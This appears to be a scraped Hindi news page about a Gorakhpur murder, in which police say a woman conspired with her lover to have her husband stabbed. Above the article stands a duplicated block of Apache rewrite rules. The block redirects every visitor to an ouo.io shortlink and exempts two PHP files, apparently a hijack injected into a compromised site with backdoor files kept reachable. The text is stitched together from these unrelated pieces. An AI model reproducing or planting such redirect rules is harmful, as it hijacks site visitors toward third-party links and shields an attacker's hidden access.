
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 532
गोरखपुर। यहां पर एक महिला ने अपने यार के साथ अवैध संबंधों में बाधक बन रहे पति की हत्या का ही प्लान रच डाला। उत्तरप्रदेश के गोरखपुर में चर्चित विनोद शर्मा हत्याकांड से पुलिस ने पर्दा उठाया है।
पुलिस का कहना है कि विनोद की हत्या उसकी पत्नी आशा शर्मा के इशारे पर हुई थी। दरअसल विनोद की पत्नी किसी और से संबंध बनाना चाहती थी, जब विनोद को इसका पता चला तो उसने इसका विरोध किया। यही विरोध विनोद को पड़ा भारी और बनी इसकी मौत का कारण। आरोपी पत्नी समेत वारदात में शामिल अन्य तीन को पुलिस ने गिरफ्तार किया है। दरअसल विनोद शर्मा की पत्नी के एक होलट कारोबारी अनूप मोदनवाल के साथ अवैध संबंध बन गए थे। ऑफिस जाने के बहाने आशा अक्सर अनूप के साथ होती थी। पुलिस का कहना है कि होटल कारोबारी, आशा के जीवन में पहला गैर मर्द नहीं था। आशा के और भी लोगों के साथ शारीरिक संबंध थे। विनोद को पत्नी के गैर मर्दों के साथ संबंधों का पता था। पति हमेशा उसे रोकता भी था। पर अब आशा ने अपनी अय्याशी के बीच आने वाले पति को रास्ते से हटाने का ठान लिया था।
होटल कारोबारी से नाजायज संबंधों की खातिर आशा ने अपने ही पति की हत्या की साजिश रची थी। जिसके तहत बीते 30 तारीख की शाम को आशा ने पति विनोद शर्मा से मीट खाने की जिद की। ऐसे में पति को खुद की बताई गई जगह से मीट लाने के लिए बाजार भेजा था। जहां पहले से ही घात लगाए अनूप मोदनवाल और संदीप मद्धेशिया ने चाकू से गोदकर विनोद की हत्या कर दी। वारदात के बाद आरोपी मौके से फरार हो गए थे। हत्या की सूचना पर पुलिस ने मृतक के भाई की तहरीर पर अज्ञात हमलावरों के खिलाफ केस दर्ज किया था।